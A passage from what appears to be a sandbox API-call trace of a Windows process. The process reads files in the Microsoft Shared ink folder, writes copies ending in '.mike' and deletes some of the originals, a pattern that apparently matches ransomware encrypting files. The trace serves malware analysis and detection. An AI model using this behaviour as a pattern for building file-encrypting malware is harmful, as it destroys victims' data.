lpOldMode=0x2af028) returned 1 [0043.952] GetFileType (hFile=0x264) returned 0x1 [0043.952] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.952] ReadFile (in: hFile=0x264, lpBuffer=0x21fdfa4, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x21fdfa4*, lpNumberOfBytesRead=0x2af0c8*=0xa28, lpOverlapped=0x0) returned 1 [0043.954] CloseHandle (hObject=0x264) returned 1 [0043.954] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.954] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af03c) returned 1 [0043.954] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.954] GetFileType (hFile=0x264) returned 0x1 [0043.954] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af038) returned 1 [0043.954] GetFileType (hFile=0x264) returned 0x1 [0043.954] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.954] WriteFile (in: hFile=0x264, lpBuffer=0x2204b3c*, nNumberOfBytesToWrite=0xa30, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x2204b3c*, lpNumberOfBytesWritten=0x2af0bc*=0xa30, lpOverlapped=0x0) returned 1 [0043.955] CloseHandle (hObject=0x264) returned 1 [0043.955] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.956] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af044) returned 1 [0043.956] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.956] GetFileType (hFile=0x264) returned 0x1 [0043.956] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af040) returned 1 [0043.956] GetFileType (hFile=0x264) returned 0x1 [0043.957] WriteFile (in: hFile=0x264, lpBuffer=0x2207d50*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2207d50*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.957] CloseHandle (hObject=0x264) returned 1 [0043.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af138) returned 1 [0043.958] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4672160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4672160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4672160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0043.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af134) returned 1 [0043.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.958] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.958] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2209400 | out: lpFileInformation=0x2209400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4672160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4672160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4672160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0043.958] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af17c) returned 1 [0043.958] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.958] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", dwFileAttributes=0x80) returned 0 [0043.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.959] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.959] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.960] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: lpFileInformation=0x2af0ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe4672160, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe4672160, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe4672160, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xc50)) returned 1 [0043.960] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af06c) returned 1 [0043.960] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml", lpFilePart=0x0) returned 0x3d [0043.960] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec18, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike", lpFilePart=0x0) returned 0x42 [0043.960] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsplk.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsplk.xml.mike")) returned 1 [0043.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\IpsPlugin.dll", lpFilePart=0x0) returned 0x40 [0043.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.961] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aec28, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.961] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af11c) returned 1 [0043.961] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0043.962] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2adf58) returned 1 [0043.962] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aeb60, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.962] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af054) returned 1 [0043.962] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.963] GetFileType (hFile=0x264) returned 0x1 [0043.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af050) returned 1 [0043.963] GetFileType (hFile=0x264) returned 0x1 [0043.963] CloseHandle (hObject=0x264) returned 1 [0043.963] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecac, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.963] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.963] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0x2aec5c, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3 [0043.963] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af1b0) returned 1 [0043.963] GetDiskFreeSpaceExW (in: lpDirectoryName="C:\\", lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc | out: lpFreeBytesAvailableToCaller=0x2af1dc, lpTotalNumberOfBytes=0x2af1d4, lpTotalNumberOfFreeBytes=0x2af1cc) returned 1 [0043.963] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x2af1ac) returned 1 [0043.964] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af180) returned 1 [0043.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), fInfoLevelId=0x0, lpFileInformation=0x220d4f4 | out: lpFileInformation=0x220d4f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6)) returned 1 [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), fInfoLevelId=0x0, lpFileInformation=0x220d7e4 | out: lpFileInformation=0x220d7e4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6)) returned 1 [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.964] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecb8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecb0, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aec3c, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.964] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec40, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.965] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af11c | out: lpFileInformation=0x2af11c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0043.965] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.965] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.965] GetFileType (hFile=0x264) returned 0x1 [0043.965] GetFileType (hFile=0x264) returned 0x1 [0043.965] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x0 [0043.965] WriteFile (in: hFile=0x264, lpBuffer=0x220e538*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x220e538*, lpNumberOfBytesWritten=0x2af0bc*=0x220, lpOverlapped=0x0) returned 1 [0043.966] CloseHandle (hObject=0x264) returned 1 [0043.966] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), fInfoLevelId=0x0, lpFileInformation=0x220e07c | out: lpFileInformation=0x220e07c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x27d546fc, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x27d546fc, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x918b14d1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8c6)) returned 1 [0043.966] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aeb38, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.967] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.967] GetFileType (hFile=0x264) returned 0x1 [0043.967] GetFileType (hFile=0x264) returned 0x1 [0043.967] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af0bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2af0bc*=0) returned 0x0 [0043.967] ReadFile (in: hFile=0x264, lpBuffer=0x220f64c, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x2af0c8, lpOverlapped=0x0 | out: lpBuffer=0x220f64c*, lpNumberOfBytesRead=0x2af0c8*=0x8c6, lpOverlapped=0x0) returned 1 [0043.979] CloseHandle (hObject=0x264) returned 1 [0043.980] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb48, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.980] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.980] GetFileType (hFile=0x264) returned 0x1 [0043.980] GetFileType (hFile=0x264) returned 0x1 [0043.980] SetFilePointer (in: hFile=0x264, lDistanceToMove=0, lpDistanceToMoveHigh=0x2af010*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2af010*=0) returned 0x220 [0043.980] WriteFile (in: hFile=0x264, lpBuffer=0x22159a8*, nNumberOfBytesToWrite=0x8d0, lpNumberOfBytesWritten=0x2af0bc, lpOverlapped=0x0 | out: lpBuffer=0x22159a8*, lpNumberOfBytesWritten=0x2af0bc*=0x8d0, lpOverlapped=0x0) returned 1 [0043.980] CloseHandle (hObject=0x264) returned 1 [0043.981] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aeb50, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.981] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x264 [0043.981] GetFileType (hFile=0x264) returned 0x1 [0043.981] GetFileType (hFile=0x264) returned 0x1 [0043.982] WriteFile (in: hFile=0x264, lpBuffer=0x2218bbc*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x2af0ec, lpOverlapped=0x0 | out: lpBuffer=0x2218bbc*, lpNumberOfBytesWritten=0x2af0ec*=0x20c, lpOverlapped=0x0) returned 1 [0043.982] CloseHandle (hObject=0x264) returned 1 [0043.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd8, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.983] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af1b4 | out: lpFileInformation=0x2af1b4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46982c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46982c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46be420, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xaf0)) returned 1 [0043.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.983] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aecd4, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.984] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x221a26c | out: lpFileInformation=0x221a26c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe46982c0, ftCreationTime.dwHighDateTime=0x1d57a86, ftLastAccessTime.dwLowDateTime=0xe46982c0, ftLastAccessTime.dwHighDateTime=0x1d57a86, ftLastWriteTime.dwLowDateTime=0xe46be420, ftLastWriteTime.dwHighDateTime=0x1d57a86, nFileSizeHigh=0x0, nFileSizeLow=0xaf0)) returned 1 [0043.984] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aec58, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", dwFileAttributes=0x80) returned 0 [0043.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", nBufferLength=0x105, lpBuffer=0x2aebec, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml", lpFilePart=0x0) returned 0x3d [0043.985] GetFullPathNameW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", nBufferLength=0x105, lpBuffer=0x2aec10, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike", lpFilePart=0x0) returned 0x42 [0043.985] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x2af070) returned 1 [0043.985] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\ipsptb.xml.mike" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\ipsptb.xml.mike"), fInfoLevelId=0x0, lpFileInformation=0x2af0ec | out: 